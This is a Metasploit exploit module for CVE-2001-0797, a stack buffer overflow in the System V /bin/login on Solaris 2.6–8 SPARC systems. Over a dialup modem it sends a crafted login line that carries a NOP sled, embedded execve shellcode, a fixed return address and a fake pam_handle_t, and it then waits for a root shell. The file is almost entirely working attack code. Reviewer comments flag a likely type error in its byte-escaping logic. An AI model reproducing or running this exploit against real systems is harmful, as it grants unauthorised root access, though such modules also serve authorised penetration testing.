Path: blob/master/modules/exploits/solaris/dialup/manyargs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Dialup exploit module for CVE-2001-0797: a stack buffer overflow in the
# System V derived /bin/login, triggered by passing it an excessive number
# of arguments at the login prompt.  The module dials the target's modem,
# waits for the login prompt, streams a crafted login line (see buildbuf),
# and then watches for the password prompt and a root shell prompt.
#
# Operational notes declared in the metadata: a failed attempt can crash the
# service (CRASH_SERVICE_RESTARTS), the attempt leaves artifacts in the
# target's logs (IOC_IN_LOGS), and a successful run is repeatable
# (REPEATABLE_SESSION).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Dialup
  include Msf::Module::Deprecated

  # Old module path; the framework redirects references to it here.
  moved_from 'exploit/dialup/multi/login/manyargs'

  # Module metadata.  Only one target is defined (Solaris 2.6 - 8 on SPARC);
  # it carries its own fixed return address, NOP instruction and shellcode.
  # NOTE(review): 'Payload' declares 3000 bytes of space, but buildbuf never
  # references the framework-generated payload — it embeds the target's
  # 'Shellcode' directly.  With 'Arch' => ARCH_TTY the payload/handler pair
  # presumably just attaches to the dialup line; confirm against the mixin.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
        'Description' => %q{
          This exploit connects to a system's modem over dialup and exploits
          a buffer overflow vulnerability in it's System V derived /bin/login.
          The vulnerability is triggered by providing a large number of arguments.
        },
        'References' => [
          ['CVE', '2001-0797'],
          ['OSVDB', '690'],
          ['OSVDB', '691'],
          ['BID', '3681'],
          ['URL', 'https://web.archive.org/web/20120114122443/http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
          ['URL', 'https://web.archive.org/web/20120114113100/http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
          ['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_rlogin.c'],
        ],
        'Author' => [
          'I)ruid',
        ],
        'Arch' => ARCH_TTY,
        'Platform' => ['unix'],
        'License' => MSF_LICENSE,
        'Payload' => {
          'Space' => 3000,
          'BadChars' => '',
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Solaris 2.6 - 8 (SPARC)',
            {
              'Platform' => 'unix',
              # Fixed return address used twice by buildbuf (after the login
              # name and inside the fake pam_handle_t header).
              'Ret' => 0x00027184,
              # Solaris/SPARC special shellcode (courtesy of inode)
              # execve() + exit()
              # 64 bytes; contains 0x20 (space) and 0x00 bytes, which matter
              # for the escaping logic in buildbuf.
              'Shellcode' =>
                "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" \
                "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" \
                "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" \
                "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
              # 4-byte SPARC NOP used to build the sled.
              'NOP' => "\x90\x1b\x80\x0e"
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2001-12-12',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
  end

  # Builds the single login line that is sent to the target.
  #
  # Layout, in order (offsets tracked by +i+):
  #   'bin '            - login name
  #   retaddr + ' '     - 4-byte big-endian return address from the target
  #   'a ' * 60         - 60 extra arguments that overflow the buffer
  #   ' BBB'            - padding
  #   nop * 398         - 1592-byte NOP sled
  #   shellcode         - target shellcode, with a few bytes escaped
  #   'BBB '            - padding
  #   16 x 'C', retaddr, 0x01, 52 x NULL words, "\x00\x00\x00 AAAA\n"
  #                     - a minimal fake pam_handle_t
  #
  # @return [String] the assembled buffer
  #
  # NOTE(review): `buf` starts as a plain '' literal; the first `[]=` of a
  # packed (ASCII-8BIT) value retags it as binary, so `buf.length` in
  # #exploit is a byte count.  Keep that in mind if this is ever refactored.
  def buildbuf
    print_status("Targeting: #{target.name}")

    retaddr = target.ret
    shellcode = target['Shellcode']
    nop = target['NOP']

    # prepare the evil buffer
    i = 0
    buf = ''

    # login name
    buf[i, 4] = 'bin '
    i += 4

    # return address
    buf[i, 4] = [retaddr].pack('N')
    i += 4
    buf[i, 1] = ' '
    i += 1

    # trigger the overflow
    (0...60).each do |_c|
      buf[i, 2] = 'a '
      i += 2
    end

    # padding
    buf[i, 4] = ' BBB'
    i += 4

    # nop sled and shellcode
    (0...398).each do |_c|
      buf[i, nop.size] = nop
      i += nop.size
    end
    # Copy the shellcode byte by byte.  A backslash is doubled; 0xff, newline,
    # space and tab are written as a backslash followed by three octal digits;
    # everything else (including 0x00) is copied verbatim.
    shellcode.each_byte do |b|
      c = b.chr
      case c
      when '\\'
        buf[i, 2] = '\\\\'
        i += 2
      when "\xff", "\n", ' ', "\t"
        # NOTE(review): this branch is reached for the 0x20 bytes in the
        # shipped shellcode, and `Integer + '0'` raises TypeError in plain
        # Ruby — this reads like a C-style `'0' + x` that meant the ordinal
        # 0x30.  Confirm whether any loaded core extension changes that.
        # NOTE(review): whether `"\xff"` ever matches `b.chr` depends on the
        # source encoding the module loader applies; the shipped shellcode
        # contains no 0xff byte, so that case is not exercised by it.
        buf[i, 1] = '\\'
        buf[i + 1, 1] = (((b & 0o300) >> 6) + '0').chr
        buf[i + 2, 1] = (((b & 0o070) >> 3) + '0').chr
        buf[i + 3, 1] = ((b & 0o007) + '0').chr
        i += 4
      else
        buf[i, 1] = c
        i += 1
      end
    end

    # TODO: need to overwrite/skip the last byte of shellcode?
    # i -= 1

    # padding
    buf[i, 4] = 'BBB '
    i += 4

    # pam_handle_t: minimal header
    buf[i, 16] = 'CCCCCCCCCCCCCCCC'
    i += 16
    buf[i, 4] = [retaddr].pack('N')
    i += 4
    buf[i, 4] = [0x01].pack('N')
    i += 4

    # pam_handle_t: NULL padding
    (0...52).each do |_c|
      buf[i, 4] = [0].pack('N')
      i += 4
    end

    # pam_handle_t: pameptr must be the 65th ptr
    # The trailing "\n" terminates the login line.
    buf[i, 9] = "\x00\x00\x00 AAAA\n"
    i += 9

    return buf
  end

  # Runs the exploit: dial, wait for the login prompt, stream the buffer in
  # 256-byte chunks, then expect a password prompt followed by a '# ' shell
  # prompt before handing the line to the handler.  Every failure path
  # disconnects the dialup session (except a failed connect, where there is
  # nothing to disconnect) and returns without raising.
  #
  # dialup_expect is assumed to return a Hash with :match and :buffer keys
  # (only :match is read here; :buffer appears in the debug comments).
  def exploit
    buf = buildbuf

    print_status('Dialing Target')
    if !connect_dialup
      print_error('Exiting.')
      return
    end

    print_status('Waiting for login prompt')

    res = dialup_expect(/ogin:\s/i, 10)
    # puts Rex::Text.to_hex_dump(res[:buffer])
    if !(res[:match])
      print_error('Login prompt not found... Exiting.')
      disconnect_dialup
      return
    end

    # send the evil buffer, 256 chars at a time
    print_status('Sending evil buffer...')
    # puts Rex::Text.to_hex_dump(buf)
    len = buf.length
    # Offset into buf of the next chunk (local `p` shadows Kernel#p here).
    p = 0
    while (len > 0)
      i = len > 0x100 ? 0x100 : len
      # puts Rex::Text.to_hex_dump(buf[p,i])
      dialup_puts(buf[p, i])
      len -= i
      p += i
      # if len > 0
      # puts Rex::Text.to_hex_dump("\x04")
      # dialup_puts("\x04") if len > 0
      # end
      # Kernel#select with no descriptors: a 0.5 s pause between chunks so
      # the modem/tty can drain.
      select(nil, nil, nil, 0.5)
    end

    # wait for password prompt
    print_status('Waiting for password prompt')
    res = dialup_expect(/assword:/i, 30)
    # puts Rex::Text.to_hex_dump(res[:buffer])
    if !(res[:match])
      print_error('Target is likely not vulnerable... Exiting.')
      disconnect_dialup
      return
    end

    print_status('Password prompt received, waiting for shell')
    # Any password will do once the overflow has taken effect.
    dialup_puts("pass\n")

    res = dialup_expect(/#\s/i, 20)
    # puts Rex::Text.to_hex_dump(res[:buffer])
    if !(res[:match])
      print_error('Shell not found.')
      print_error('Target is likely not vulnerable... Exiting.')
      disconnect_dialup
      return
    end

    print_status('Success!!!')
    handler

    disconnect_dialup
  end
end